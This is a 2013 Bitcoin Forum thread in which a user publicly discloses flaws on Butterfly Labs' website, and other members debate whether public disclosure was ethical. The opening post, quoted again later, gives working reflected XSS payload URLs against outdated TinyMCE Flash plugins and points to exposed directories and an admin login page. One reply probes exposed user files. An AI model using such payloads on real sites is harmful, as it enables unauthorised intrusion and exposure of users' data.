Bitcoin Forum
November 02, 2024, 10:03:46 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1] 2 »  All
  Print  
Author Topic: BFL's site is incredibly amateur...  (Read 2877 times)
n4ru (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 250



View Profile
May 03, 2013, 01:24:41 AM
Last edit: May 03, 2013, 06:37:44 PM by n4ru
 #1

So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done Wink
mustyoshi
Sr. Member
****
Offline Offline

Activity: 287
Merit: 250



View Profile
May 03, 2013, 02:12:58 AM
 #2

While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
Todamont
Sr. Member
****
Offline Offline

Activity: 606
Merit: 273


View Profile
May 03, 2013, 02:31:04 AM
 #3

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.
n4ru (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 250



View Profile
May 03, 2013, 03:03:18 AM
 #4

While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
freedomno1
Legendary
*
Offline Offline

Activity: 1806
Merit: 1090


Learning the troll avoidance button :)


View Profile
May 03, 2013, 03:11:20 AM
 #5

That's weak coding nice infiltration do that myself sometimes
http://www.butterflylabs.com/images/admin/butterfly-admin.jpg

Believing in Bitcoins and it's ability to change the world
mustyoshi
Sr. Member
****
Offline Offline

Activity: 287
Merit: 250



View Profile
May 03, 2013, 03:12:22 AM
 #6

While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
It's fine and dandy to believe that, except by outing this, you've put other people's information at risk. Let's say somebody does get into BFL's systems, what kind of information do you think they have stored on their servers? Information that somebody who has a vendetta against bitcoin could put to good use, such as the mailing addresses of tens of thousands of people. Not to mention any related payment information.
freedomno1
Legendary
*
Offline Offline

Activity: 1806
Merit: 1090


Learning the troll avoidance button :)


View Profile
May 03, 2013, 03:17:56 AM
 #7

Not the right directory I believe

Believing in Bitcoins and it's ability to change the world
wabber
Member
**
Offline Offline

Activity: 85
Merit: 10


View Profile
May 03, 2013, 07:24:59 AM
 #8

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
n4ru (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 250



View Profile
May 03, 2013, 07:36:16 AM
 #9

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
Well said.
freedomno1
Legendary
*
Offline Offline

Activity: 1806
Merit: 1090


Learning the troll avoidance button :)


View Profile
May 03, 2013, 08:39:02 AM
 #10

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
Well said.
Agreed hackers like exploring architecture and systems its a natural instinct and curiosity just make a good defense so we can learn Smiley
Sides we always say evil hackers we mean evil crackers lol (Evil soda crackers Smiley since they are the new overlords XD

Believing in Bitcoins and it's ability to change the world
Inaba
Legendary
*
Offline Offline

Activity: 1260
Merit: 1000



View Profile WWW
May 03, 2013, 03:49:24 PM
 #11

I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.


If you're searching these lines for a point, you've probably missed it.  There was never anything there in the first place.
dhenson
Legendary
*
Offline Offline

Activity: 994
Merit: 1000



View Profile
May 03, 2013, 06:12:43 PM
 #12

I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

Say what you will about Josh's usual responses, but this IMO was the perfect reaction to this situation.

Crack the whip!
n4ru (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 250



View Profile
May 03, 2013, 08:40:23 PM
 #13

I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.


At least you guys responded to this quick and got it fixed. There was a lot more that could have been done with malicious intent.
sgbett
Legendary
*
Offline Offline

Activity: 2576
Merit: 1087



View Profile
May 03, 2013, 09:39:52 PM
 #14

You posted it because you wanted to flex your e-peen.

I'm sure everyone is glad that you decided there time was best spent fixing this.

"A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution" - Satoshi Nakamoto
*my posts are not investment advice*
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
May 03, 2013, 11:56:45 PM
 #15

So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done Wink

Pretty lulzy stuff.

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Yeah, right. In you know...Iran. Or whatever other shithole noncountry.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
Deafboy
Hero Member
*****
Offline Offline

Activity: 482
Merit: 502



View Profile WWW
May 04, 2013, 12:05:09 AM
 #16

At first I wanted to mention Aaron Swartz as counter argument, but realized that MPOE-PR is right. Mostly shithole noncountries like Iran, USA or China are affected Smiley
edit: to be a little positive +1 for Inaba's reaction.
sgbett
Legendary
*
Offline Offline

Activity: 2576
Merit: 1087



View Profile
May 11, 2013, 01:00:25 AM
 #17

sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?

"A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution" - Satoshi Nakamoto
*my posts are not investment advice*
Phinnaeus Gage
Legendary
*
Offline Offline

Activity: 1918
Merit: 1570


Bitcoin: An Idea Worth Spending


View Profile WWW
May 11, 2013, 05:41:45 AM
 #18

Here's something interesting: http://webcache.googleusercontent.com/search?q=cache:V2NAhB0iUlwJ:butterflylabs.com/images/users/000/003/366/066/imageGallery/+&cd=2&hl=en&ct=clnk&gl=us

Quote
FAA Letter-Approval0001.jpg     06-Apr-2012 02:15    31K

I only know of one pilot associated with Butterfly Labs, and that person wouldn't have had access to BFL's computer at that time because https://bitcointalk.org/index.php?topic=97269.msg1071218#msg1071218

It's a shame that image is no longer available. Or is it?
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
May 11, 2013, 12:27:01 PM
 #19

sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropiate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides, Zerlan etc)?

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
smoothie
Legendary
*
Offline Offline

Activity: 2492
Merit: 1474


LEALANA Bitcoin Grim Reaper


View Profile
May 12, 2013, 09:07:56 AM
 #20

I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.



Everything? Oh you mean like those half-assed updates that have no substance? Rrrrright lol

Dont make me laugh Joshy-boy.

███████████████████████████████████████

            ,╓p@@███████@╗╖,           
        ,p████████████████████N,       
      d█████████████████████████b     
    d██████████████████████████████æ   
  ,████²█████████████████████████████, 
 ,█████  ╙████████████████████╨  █████y
 ██████    `████████████████`    ██████
║██████       Ñ███████████`      ███████
███████         ╩██████Ñ         ███████
███████    ▐▄     ²██╩     a▌    ███████
╢██████    ▐▓█▄          ▄█▓▌    ███████
 ██████    ▐▓▓▓▓▌,     ▄█▓▓▓▌    ██████─
           ▐▓▓▓▓▓▓█,,▄▓▓▓▓▓▓▌          
           ▐▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▌          
    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓─  
     ²▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╩    
        ▀▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▀       
           ²▀▀▓▓▓▓▓▓▓▓▓▓▓▓▀▀`          
                   ²²²                 
███████████████████████████████████████

. ★☆ WWW.LEALANA.COM        My PGP fingerprint is A764D833.                  History of Monero development Visualization ★☆ .
LEALANA BITCOIN GRIM REAPER SILVER COINS.
 
Pages: [1] 2 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!